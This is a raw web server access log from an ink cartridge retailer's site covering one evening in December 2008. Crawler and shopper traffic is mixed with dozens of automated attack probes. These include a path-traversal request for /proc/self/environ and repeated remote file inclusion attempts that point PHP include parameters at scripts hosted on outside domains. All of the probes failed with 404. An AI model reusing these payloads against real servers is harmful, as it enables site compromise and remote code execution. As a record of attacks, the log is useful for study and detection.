74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /logs/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "site.inkjetcartridge.com"
74.208.145.116 - - [31/Dec/2008:19:48:58 -0800] "GET /errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:19:56:32 -0800] "GET /phpbb/viewtopic.php?p=17 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
208.111.154.15 - - [31/Dec/2008:19:57:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "site.inkjetcartridge.com"
208.111.154.15 - - [31/Dec/2008:19:57:43 -0800] "GET / HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "site.inkjetcartridge.com"
91.194.85.79 - - [31/Dec/2008:20:03:02 -0800] "GET /phpbb/viewtopic.php?t=1641 HTTP/1.1" 200 533 "http://www.firstruleta.com/downloadablepyramidpokerdescargar.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iRider 2.21.1108; FDM)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:51 -0800] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:51 -0800] "GET /images/canon-pixma-ip3500.jpg HTTP/1.1" 200 39459 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:51 -0800] "GET /images/brother-mfc-240cn.jpg HTTP/1.1" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:52 -0800] "GET /images/brother-mfc-5460cn.jpg HTTP/1.1" 200 20615 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:52 -0800] "GET /images/brother-mfc-885cw.jpg HTTP/1.1" 200 27931 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:52 -0800] "GET /images/canon-pixma-ip4500.jpg HTTP/1.1" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:53 -0800] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:53 -0800] "GET /images/epson-r2400.jpg HTTP/1.1" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:53 -0800] "GET /images/hp-laserjet3050.jpg HTTP/1.1" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
99.141.80.142 - - [31/Dec/2008:20:15:54 -0800] "GET /images/samsung-clip-300.jpg HTTP/1.1" 200 24467 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5; .NET CLR 1.1.4322)" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:20:45:45 -0800] "GET /phpbb/viewtopic.php?t=1352&view=previous&sid=ee9a7c717adb75a4f5e921ee88603952 HTTP/1.1" 200 454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
74.54.156.73 - - [31/Dec/2008:20:47:23 -0800] "GET /phpbb/posting.php?mode=quote&p=3285 HTTP/1.1" 200 534 "http://www.firstruleta.com/mejorcasinoespanaproductformula1freecash.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:21:09:14 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:21:09:14 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
70.87.63.234 - - [31/Dec/2008:21:09:14 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
81.176.226.164 - - [31/Dec/2008:21:14:58 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
81.176.226.164 - - [31/Dec/2008:21:14:58 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
81.176.226.164 - - [31/Dec/2008:21:14:58 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:21:19:31 -0800] "GET /phpbb/viewtopic.php?t=22445&view=next&sid=00772b9ea79d04155e3fbf1bfa65c1e3 HTTP/1.1" 200 454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
74.53.137.2 - - [31/Dec/2008:21:25:03 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.137.2 - - [31/Dec/2008:21:25:03 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.53.137.2 - - [31/Dec/2008:21:25:03 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:16 -0800] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:17 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:18 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:57 -0800] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:57 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:26:58 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:27:10 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:27:10 -0800] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:27:15 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:46 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:46 -0800] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:47 -0800] "GET /logs/access.log/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:47 -0800] "GET /logs/access.log/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:47 -0800] "GET /errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:28:48 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.109.160 - - [31/Dec/2008:21:29:00 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.109.160 - - [31/Dec/2008:21:29:01 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.109.160 - - [31/Dec/2008:21:29:01 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:29:03 -0800] "GET /logs/access.log/errors.php?error=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:29:05 -0800] "GET /errors.php?error=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:29:07 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
222.236.44.69 - - [31/Dec/2008:21:29:35 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.236.44.69 - - [31/Dec/2008:21:29:44 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
222.236.44.69 - - [31/Dec/2008:21:29:44 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:33:38 -0800] "GET /logs/access.log/errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:33:38 -0800] "GET /errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:33:38 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:34:09 -0800] "GET /logs/access.log/errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:34:09 -0800] "GET /errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:34:09 -0800] "GET /logs/errors.php?error=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:21:34:55 -0800] "GET /phpbb/viewtopic.php?p=28 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:46:23 -0800] "GET /logs/access.log%20/errors.php?error=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
200.136.238.183 - - [31/Dec/2008:21:48:26 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.136.238.183 - - [31/Dec/2008:21:48:26 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.136.238.183 - - [31/Dec/2008:21:48:27 -0800] "GET /logs/access_081101.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
74.55.128.226 - - [31/Dec/2008:21:53:09 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://ubii.t35.com/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
74.55.128.226 - - [31/Dec/2008:21:53:09 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://ubii.t35.com/idi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:56:08 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:56:08 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.68.87.161 - - [31/Dec/2008:21:56:08 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:40 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:41 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:41 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:56 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:56 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:56:56 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:25 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:25 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:25 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:33 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:34 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:21:58:34 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
80.253.245.69 - - [31/Dec/2008:21:58:46 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
80.253.245.69 - - [31/Dec/2008:21:58:46 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
65.55.105.165 - - [31/Dec/2008:22:01:55 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.55.105.165 - - [31/Dec/2008:22:01:56 -0800] "GET /email/?D=A HTTP/1.1" 200 659 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
65.23.153.9 - - [31/Dec/2008:22:03:55 -0800] "GET /links/add_link.html HTTP/1.1" 200 13168 "http://site.inkjetcartridge.com/links/add_link.html" "-" "site.inkjetcartridge.com"
173.17.113.47 - - [31/Dec/2008:22:03:55 -0800] "GET /links/add_link.html HTTP/1.1" 200 13168 "http://site.inkjetcartridge.com/links/add_link.html" "-" "site.inkjetcartridge.com"
66.249.65.203 - - [31/Dec/2008:22:04:00 -0800] "GET /phpbb/viewtopic.php?t=688&view=next&sid=02600b9959939e5b5b0e0385f03a0219 HTTP/1.1" 200 454 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:09:53 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:09:54 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.169.175.169 - - [31/Dec/2008:22:10:25 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "site.inkjetcartridge.com"
81.169.175.169 - - [31/Dec/2008:22:10:25 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "site.inkjetcartridge.com"
81.169.175.169 - - [31/Dec/2008:22:10:25 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "site.inkjetcartridge.com"
207.58.128.37 - - [31/Dec/2008:22:13:34 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
207.58.128.37 - - [31/Dec/2008:22:15:23 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
207.58.128.37 - - [31/Dec/2008:22:15:23 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "site.inkjetcartridge.com"
211.79.112.85 - - [31/Dec/2008:22:16:29 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
211.79.112.85 - - [31/Dec/2008:22:17:08 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
211.79.112.85 - - [31/Dec/2008:22:17:57 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.chili-dragrace.com/images/saves.png?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:21:10 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:21:10 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:21:10 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:22:30 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:22:32 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
89.218.85.18 - - [31/Dec/2008:22:22:32 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/data/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:22:22:51 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:22:22:51 -0800] "GET /include/lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
154.11.13.142 - - [31/Dec/2008:22:22:52 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
81.176.226.164 - - [31/Dec/2008:22:24:18 -0800] "GET /logs/access_081101.log/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "site.inkjetcartridge.com"
